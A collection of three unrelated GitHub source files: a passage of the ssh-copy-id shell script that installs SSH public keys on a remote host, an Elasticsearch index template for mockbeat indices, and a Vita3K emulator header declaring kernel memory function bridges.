    printf "%s: ERROR: Less dimwitted shell required.\n" "$0"
    exit 1
  fi
fi

most_recent_id="$(cd "$HOME" ; ls -t .ssh/id*.pub 2>/dev/null | grep -v -- '-cert.pub$' | head -n 1)"
DEFAULT_PUB_ID_FILE="${most_recent_id:+$HOME/}$most_recent_id"

usage () {
  printf 'Usage: %s [-h|-?|-f|-n] [-i [identity_file]] [-p port] [[-o <ssh -o options>] ...] [user@]hostname\n' "$0" >&2
  printf '\t-f: force mode -- copy keys without trying to check if they are already installed\n' >&2
  printf '\t-n: dry run -- no keys are actually copied\n' >&2
  printf '\t-h|-?: print this help\n' >&2
  exit 1
}

# escape any single quotes in an argument
quote() {
  printf "%s\n" "$1" | sed -e "s/'/'\\\\''/g"
}

use_id_file() {
  local L_ID_FILE="$1"
  if [ -z "$L_ID_FILE" ] ; then
    printf "%s: ERROR: no ID file found\n" "$0"
    exit 1
  fi
  if expr "$L_ID_FILE" : ".*\.pub$" >/dev/null ; then
    PUB_ID_FILE="$L_ID_FILE"
  else
    PUB_ID_FILE="$L_ID_FILE.pub"
  fi

  [ "$FORCED" ] || PRIV_ID_FILE=$(dirname "$PUB_ID_FILE")/$(basename "$PUB_ID_FILE" .pub)

  # check that the files are readable
  for f in "$PUB_ID_FILE" ${PRIV_ID_FILE:+"$PRIV_ID_FILE"} ; do
    ErrMSG=$( { : < "$f" ; } 2>&1 ) || {
      local L_PRIVMSG=""
      [ "$f" = "$PRIV_ID_FILE" ] && L_PRIVMSG=" (to install the contents of '$PUB_ID_FILE' anyway, look at the -f option)"
      printf "\n%s: ERROR: failed to open ID file '%s': %s\n" "$0" "$f" "$(printf "%s\n%s\n" "$ErrMSG" "$L_PRIVMSG" | sed -e 's/.*: *//')"
      exit 1
    }
  done
  printf '%s: INFO: Source of key(s) to be installed: "%s"\n' "$0" "$PUB_ID_FILE" >&2
  GET_ID="cat \"$PUB_ID_FILE\""
}

if [ -n "$SSH_AUTH_SOCK" ] && ssh-add -L >/dev/null 2>&1 ; then
  GET_ID="ssh-add -L"
fi

while test "$#" -gt 0
do
  [ "${SEEN_OPT_I}" ] && expr "$1" : "[-]i" >/dev/null && {
    printf "\n%s: ERROR: -i option must not be specified more than once\n\n" "$0"
    usage
  }

  OPT= OPTARG=
  # implement something like getopt to avoid Solaris pain
  case "$1" in
    -i?*|-o?*|-p?*)
      OPT="$(printf -- "$1"|cut -c1-2)"
      OPTARG="$(printf -- "$1"|cut -c3-)"
      shift
      ;;
    -o|-p)
      OPT="$1"
      OPTARG="$2"
      shift 2
      ;;
    -i)
      OPT="$1"
      test "$#" -le 2 || expr "$2" : "[-]" >/dev/null || {
        OPTARG="$2"
        shift
      }
      shift
      ;;
    -f|-n|-h|-\?)
      OPT="$1"
      OPTARG=
      shift
      ;;
    --)
      shift
      while test "$#" -gt 0
      do
        SAVEARGS="${SAVEARGS:+$SAVEARGS }'$(quote "$1")'"
        shift
      done
      break
      ;;
    -*)
      printf "\n%s: ERROR: invalid option (%s)\n\n" "$0" "$1"
      usage
      ;;
    *)
      SAVEARGS="${SAVEARGS:+$SAVEARGS }'$(quote "$1")'"
      shift
      continue
      ;;
  esac

  case "$OPT" in
    -i)
      SEEN_OPT_I="yes"
      use_id_file "${OPTARG:-$DEFAULT_PUB_ID_FILE}"
      ;;
    -o|-p)
      SSH_OPTS="${SSH_OPTS:+$SSH_OPTS }$OPT '$(quote "$OPTARG")'"
      ;;
    -f)
      FORCED=1
      ;;
    -n)
      DRY_RUN=1
      ;;
    -h|-\?)
      usage
      ;;
  esac
done

eval set -- "$SAVEARGS"

if [ $# = 0 ] ; then
  usage
fi
if [ $# != 1 ] ; then
  printf '%s: ERROR: Too many arguments. Expecting a target hostname, got: %s\n\n' "$0" "$SAVEARGS" >&2
  usage
fi

# drop trailing colon
USER_HOST=$(printf "%s\n" "$1" | sed 's/:$//')
# tack the hostname onto SSH_OPTS
SSH_OPTS="${SSH_OPTS:+$SSH_OPTS }'$(quote "$USER_HOST")'"

# and populate "$@" for later use (only way to get proper quoting of options)
eval set -- "$SSH_OPTS"

if [ -z "$(eval $GET_ID)" ] && [ -r "${PUB_ID_FILE:=$DEFAULT_PUB_ID_FILE}" ] ; then
  use_id_file "$PUB_ID_FILE"
fi

if [ -z "$(eval $GET_ID)" ] ; then
  printf '%s: ERROR: No identities found\n' "$0" >&2
  exit 1
fi

# populate_new_ids() uses several global variables ($USER_HOST, $SSH_OPTS ...)
# and has the side effect of setting $NEW_IDS
populate_new_ids() {
  local L_SUCCESS="$1"

  if [ "$FORCED" ] ; then
    NEW_IDS=$(eval $GET_ID)
    return
  fi

  # repopulate "$@" inside this function
  eval set -- "$SSH_OPTS"

  umask 0177
  local L_TMP_ID_FILE=$(mktemp ~/.ssh/ssh-copy-id_id.XXXXXXXXXX)
  if test $? -ne 0 || test "x$L_TMP_ID_FILE" = "x" ; then
    printf '%s: ERROR: mktemp failed\n' "$0" >&2
    exit 1
  fi
  local L_CLEANUP="rm -f \"$L_TMP_ID_FILE\" \"${L_TMP_ID_FILE}.stderr\""
  trap "$L_CLEANUP" EXIT TERM INT QUIT
  printf '%s: INFO: attempting to log in with the new key(s), to filter out any that are already installed\n' "$0" >&2

  NEW_IDS=$(
    eval $GET_ID | {
      while read ID || [ "$ID" ] ; do
        printf '%s\n' "$ID" > "$L_TMP_ID_FILE"

        # the next line assumes $PRIV_ID_FILE only set if using a single id file - this
        # assumption will break if we implement the possibility of multiple -i options.
        # The point being that if file based, ssh needs the private key, which it cannot
        # find if only given the contents of the .pub file in an unrelated tmpfile
        ssh -i "${PRIV_ID_FILE:-$L_TMP_ID_FILE}" \
            -o ControlPath=none \
            -o LogLevel=INFO \
            -o PreferredAuthentications=publickey \
            -o IdentitiesOnly=yes "$@" exit 2>"$L_TMP_ID_FILE.stderr" </dev/null
        if [ "$?" = "$L_SUCCESS" ] ; then
          : > "$L_TMP_ID_FILE"
        else
          grep 'Permission denied' "$L_TMP_ID_FILE.stderr" >/dev/null || {
            sed -e 's/^/ERROR: /' <"$L_TMP_ID_FILE.stderr" >"$L_TMP_ID_FILE"
            cat >/dev/null #consume the other keys, causing loop to end
          }
        fi
        cat "$L_TMP_ID_FILE"
      done
    }
  )
  eval "$L_CLEANUP" && trap - EXIT TERM INT QUIT

  if expr "$NEW_IDS" : "^ERROR: " >/dev/null ; then
    printf '\n%s: %s\n\n' "$0" "$NEW_IDS" >&2
    exit 1
  fi
  if [ -z "$NEW_IDS" ] ; then
    printf '\n%s: WARNING: All keys were skipped because they already exist on the remote system.\n' "$0" >&2
    printf '\t\t(if you think this is a mistake, you may want to use -f option)\n\n' >&2
    exit 0
  fi
  printf '%s: INFO: %d key(s) remain to be installed -- if you are prompted now it is to install the new keys\n' "$0" "$(printf '%s\n' "$NEW_IDS" | wc -l)" >&2
}

REMOTE_VERSION=$(ssh -v -o PreferredAuthentications=',' -o ControlPath=none "$@" 2>&1 | sed -ne 's/.*remote software version //p')

case "$REMOTE_VERSION" in
  NetScreen*)
    populate_new_ids 1
    for KEY in $(printf "%s" "$NEW_IDS" | cut -d' ' -f2) ; do
      KEY_NO=$(($KEY_NO + 1))
      printf "%s\n" "$KEY" | grep ssh-dss >/dev/null || {
        printf '%s: WARNING: Non-dsa key (#%d) skipped (NetScreen only supports DSA keys)\n' "$0" "$KEY_NO" >&2
        continue
      }
      [ "$DRY_RUN" ] || printf 'set ssh pka-dsa key %s\nsave\nexit\n' "$KEY" | ssh -T "$@" >/dev/null 2>&1
      if [ $? = 255 ] ; then
        printf '%s: ERROR: installation of key #%d failed (please report a bug describing what caused this, so that we can make this message useful)\n' "$0" "$KEY_NO" >&2
      else
        ADDED=$(($ADDED + 1))
      fi
    done
    if [ -z "$ADDED" ] ; then
      exit 1
    fi
    ;;
  *)
    # Assuming that the remote host treats ~/.ssh/authorized_keys as one might expect
    populate_new_ids 0
    # in ssh below - to defend against quirky remote shells: use 'exec sh -c' to get POSIX;
    # 'cd' to be at $HOME; add a newline if it's missing; and all on one line, because tcsh.
    [ "$DRY_RUN" ] || printf '%s\n' "$NEW_IDS" | \
      ssh "$@" "exec sh -c 'cd ; umask 077 ; mkdir -p .ssh && { [ -z "'`tail -1c .ssh/authorized_keys 2>/dev/null`'" ] || echo >> .ssh/authorized_keys ; } && cat >> .ssh/authorized_keys || exit 1 ; if type restorecon >/dev/null 2>&1 ; then restorecon -F .ssh .ssh/authorized_keys ; fi'" \
      || exit 1
    ADDED=$(printf '%s\n' "$NEW_IDS" | wc -l)
    ;;
esac

if [ "$DRY_RUN" ] ; then
  cat <<-EOF
=-=-=-=-=-=-=-=
Would have added the following key(s):

$NEW_IDS
=-=-=-=-=-=-=-=
EOF
else
  cat <<-EOF

Number of key(s) added: $ADDED

Now try logging into the machine, with: "ssh $SSH_OPTS"
and check to make sure that only the key(s) you wanted were added.

EOF
fi

# =-=-=-=
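# Example usage (illustrative, not part of the script) -- -i, -n and -p are the
# options parsed above; the key path, port and hostname are placeholders:
#
#   ssh-copy-id -n -i ~/.ssh/id_ed25519.pub -p 2222 user@example.com   # dry run
#   ssh-copy-id -i ~/.ssh/id_ed25519.pub -p 2222 user@example.com      # install the key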
{ "pile_set_name": "Github" }
{ "mappings": { "_default_": { "_all": { "enabled": true, "norms": { "enabled": false } }, "dynamic_templates": [ { "template1": { "mapping": { "doc_values": true, "ignore_above": 1024, "index": "not_analyzed", "type": "{dynamic_type}" }, "match": "*" } } ], "properties": { "@timestamp": { "type": "date" }, "message": { "type": "string", "index": "analyzed" }, "offset": { "type": "long", "doc_values": "true" } } } }, "settings": { "index.refresh_interval": "5s" }, "template": "mockbeat-*" }
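Illustrative usage (an assumption, not stated in the template itself): the legacy "string" type and "index": "not_analyzed" settings date this mapping to a pre-5.0 Elasticsearch. Assuming such a node on localhost and the template saved as mockbeat.template.json, it can be registered so that it applies to every index matching the "mockbeat-*" pattern:

    curl -XPUT 'http://localhost:9200/_template/mockbeat' --data-binary @mockbeat.template.json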
{ "pile_set_name": "Github" }
// Vita3K emulator project // Copyright (C) 2018 Vita3K team // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation; either version 2 of the License, or // (at your option) any later version. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. #pragma once #include <module/module.h> // TODO use macro EXPORT(SceUID, sceKernelFindMemBlockByAddr, Address addr, uint32_t size); EXPORT(int, sceKernelFreeMemBlock, SceUID uid); BRIDGE_DECL(sceKernelAllocMemBlock) BRIDGE_DECL(sceKernelAllocMemBlockForVM) BRIDGE_DECL(sceKernelAllocUnmapMemBlock) BRIDGE_DECL(sceKernelCheckModelCapability) BRIDGE_DECL(sceKernelCloseMemBlock) BRIDGE_DECL(sceKernelCloseVMDomain) BRIDGE_DECL(sceKernelFindMemBlockByAddr) BRIDGE_DECL(sceKernelFreeMemBlock) BRIDGE_DECL(sceKernelFreeMemBlockForVM) BRIDGE_DECL(sceKernelGetFreeMemorySize) BRIDGE_DECL(sceKernelGetMemBlockBase) BRIDGE_DECL(sceKernelGetMemBlockInfoByAddr) BRIDGE_DECL(sceKernelGetMemBlockInfoByRange) BRIDGE_DECL(sceKernelGetModel) BRIDGE_DECL(sceKernelGetModelForCDialog) BRIDGE_DECL(sceKernelGetSubbudgetInfo) BRIDGE_DECL(sceKernelIsPSVitaTV) BRIDGE_DECL(sceKernelOpenMemBlock) BRIDGE_DECL(sceKernelOpenVMDomain) BRIDGE_DECL(sceKernelSyncVMDomain)
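// Illustrative note (an assumption, not taken from module/module.h): BRIDGE_DECL
// declares the import bridge for a kernel export, while EXPORT carries the
// signature of the HLE implementation. A matching source file would typically
// define a stub such as:
//
//   EXPORT(int, sceKernelFreeMemBlock, SceUID uid) {
//       return UNIMPLEMENTED();
//   }
//
// The two EXPORT prototypes at the top duplicate names already listed via
// BRIDGE_DECL, which is presumably what the "TODO use macro" comment refers to.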
{ "pile_set_name": "Github" }